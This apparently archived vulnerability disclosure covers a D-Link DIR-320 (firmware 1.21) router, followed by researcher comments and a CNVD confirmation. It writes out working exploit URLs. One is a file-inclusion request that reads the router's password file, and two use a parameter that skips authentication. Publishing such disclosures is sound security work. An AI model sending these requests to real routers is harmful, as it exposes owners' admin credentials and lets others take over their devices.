D-Link某款路由存在文件包含导致密码泄露

DIR-320     1.21

文件包含漏洞（登录帐号密码直接读取）：

http://地址:1080/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd

不用登录直接访问如下地址可获取相关路由信息：

http://地址:1080/bsc_wlan.php?NO_NEED_AUTH=1&AUTH_GROUP=0

http://地址:1080/st_device.php?NO_NEED_AUTH=1&AUTH_GROUP=0

。。

厂商回应：

危害等级：中

漏洞Rank：10

确认时间：2014-07-09 15:57

厂商回复：

CNVD确认所述情况，已经与4日的多个D-link漏洞一并处置。

最新状态：

暂无

1. 2014-07-04 12:38 | niliu ( 核心白帽子 | Rank:1803 漏洞数:235 | 逆流而上)

   0

   洞主测试下ROS呗

   1# 回复此人

2. 2014-07-09 11:09 | YY-2012 ( 核心白帽子 | Rank:3861 漏洞数:736 | 意淫，是《红楼梦》原创的词汇，但后来演变...)

   1

   @疯狗 @cncert国家互联网应急中心 咋有忽略了？ @xsser 第二个洞忽略了。。

   2# 回复此人

3. 2014-07-09 11:16 | xsser ( 普通白帽子 | Rank:297 漏洞数:22 | 当我又回首一切,这个世界会好吗?)

   0

   @YY-2012 他们还不知道乌云活了吧

   3# 回复此人

4. 2014-07-09 11:19 | YY-2012 ( 核心白帽子 | Rank:3861 漏洞数:736 | 意淫，是《红楼梦》原创的词汇，但后来演变...)

   0

   @xsser 悲剧。

   4# 回复此人

5. 2014-07-09 11:22 | zph ( 普通白帽子 | Rank:244 漏洞数:44 )

   0

   @xsser 哈哈

   5# 回复此人

6. 2014-07-09 11:49 | HackBraid ( 核心白帽子 | Rank:1914 漏洞数:304 | 最近有人冒充该账号行骗，任何自称HackBrai...)

   0

   看不到细节。。。

   6# 回复此人

7. 2014-07-09 11:49 | Z-0ne ( 普通白帽子 | Rank:559 漏洞数:38 | 目前专注于工控安全基础研究，工业数据采集...)

   0

   @YY-2012 洞主跟我走吧

   7# 回复此人

8. 2014-07-09 12:18 | U神 ( 核心白帽子 | Rank:1375 漏洞数:152 | 乌云核心菜鸟，此号处于联盟托管中....)

   0

   @xsser 这是在刷人民币啊！通用算不

   8# 回复此人

9. 2014-07-09 14:44 | zph ( 普通白帽子 | Rank:244 漏洞数:44 )

   0

   啥情况？

   9# 回复此人

10. 2014-10-07 12:44 | 基佬库克 ( 实习白帽子 | Rank:75 漏洞数:15 | 简介什么的是直接爆菊吧..)

    0

    看见money了

    10# 回复此人